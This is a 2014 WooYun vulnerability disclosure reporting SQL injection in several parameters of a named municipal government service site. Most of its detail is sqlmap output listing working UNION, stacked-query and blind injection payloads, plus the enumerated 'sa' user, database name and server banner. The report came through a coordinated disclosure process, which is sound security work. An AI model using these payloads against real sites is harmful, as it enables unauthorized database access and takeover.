当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077529

漏洞标题:某市行政服务中心sql注入漏洞(sa权限)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-09-28 13:50

修复时间:2014-11-12 13:52

公开时间:2014-11-12 13:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-28: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-12: 细节向公众公开

简要描述:

多个参数都有注入危险

详细说明:

起因:

http://wooyun.org/bugs/wooyun-2014-070878


看到这里测试了下,就去另外参数处测试了下,,发现问题还是挺多的
测试地址1:

http://www.ssbz.gov.cn/web/web_info_list.jsp?type=13&catalog=2


此处type和catalag参数均存在注入危险

---
Place: GET
Parameter: type
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: type=-6262' UNION ALL SELECT NULL,CHAR(113)+CHAR(103)
+CHAR(114)+CHA
R(122)+CHAR(113)+CHAR(90)+CHAR(122)+CHAR(85)+CHAR(114)+CHAR(106)+CHAR
(109)+CHAR(
77)+CHAR(86)+CHAR(90)+CHAR(105)+CHAR(113)+CHAR(101)+CHAR(111)+CHAR
(121)+CHAR(113
),NULL,NULL-- &catalog=2
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: type=13'; WAITFOR DELAY '0:0:5'--&catalog=2
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: type=13' WAITFOR DELAY '0:0:5'--&catalog=2
---
[14:02:16] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[14:02:16] [INFO] fetching current user
[14:02:16] [WARNING] reflective value(s) found and filtering out
current user:    'sa'
[14:02:16] [INFO] fetching current database
current database:    'appo_ss'
---
Place: GET
Parameter: catalog
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=13&catalog=2' AND 5341=5341 AND 'WDMH'='WDMH
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: type=13&catalog=2' UNION ALL SELECT NULL,CHAR(113)+CHAR
(103)+CHAR(1
14)+CHAR(122)+CHAR(113)+CHAR(67)+CHAR(121)+CHAR(97)+CHAR(85)+CHAR(103)
+CHAR(88)+
CHAR(109)+CHAR(100)+CHAR(117)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(111)
+CHAR(121)+C
HAR(113),NULL,NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: type=13&catalog=2'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: type=13&catalog=2' WAITFOR DELAY '0:0:5'--
---


测试地址2:

http://www.ssbz.gov.cn/web/web_info.jsp?id=484


GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N]
sqlmap identified the following injection points with a total of 56 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=484' AND 3470=3470 AND 'vzOi'='vzOi
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=484'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=484' WAITFOR DELAY '0:0:5'--
---


测试地址3:

http://www.ssbz.gov.cn/web/about_us.jsp?type=16


GET parameter 'type' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 43 HTTP(s) requ
ests:
---
Place: GET
Parameter: type
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=16' AND 8161=8161 AND 'ztMN'='ztMN
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: type=16' UNION ALL SELECT NULL,CHAR(113)+CHAR(108)+CHAR(102)+CHAR(1
18)+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(101)+CHAR(90)+CHAR(119)+CHAR(113)+CHAR(11
1)+CHAR(65)+CHAR(108)+CHAR(75)+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(114)+CHAR(113)
,NULL,NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: type=16'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: type=16' WAITFOR DELAY '0:0:5'--
---
[14:23:42] [INFO] testing Microsoft SQL Server
[14:23:42] [INFO] confirming Microsoft SQL Server
[14:23:44] [INFO] the back-end DBMS is Microsoft SQL Server
[14:23:44] [INFO] fetching banner
web application technology: JSP
back-end DBMS operating system: Windows 2003 Service Pack 2
back-end DBMS: Microsoft SQL Server 2000
banner:
---
Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
        May  3 2005 23:18:38
        Copyright (c) 1988-2003 Microsoft Corporation
        Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---


漏洞证明:

FR@EWC{N(ANQQW6$}K5DAVF.jpg

修复方案:

对整站所有参数都过滤一下:)

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-09-29 16:37

厂商回复:

最新状态:

暂无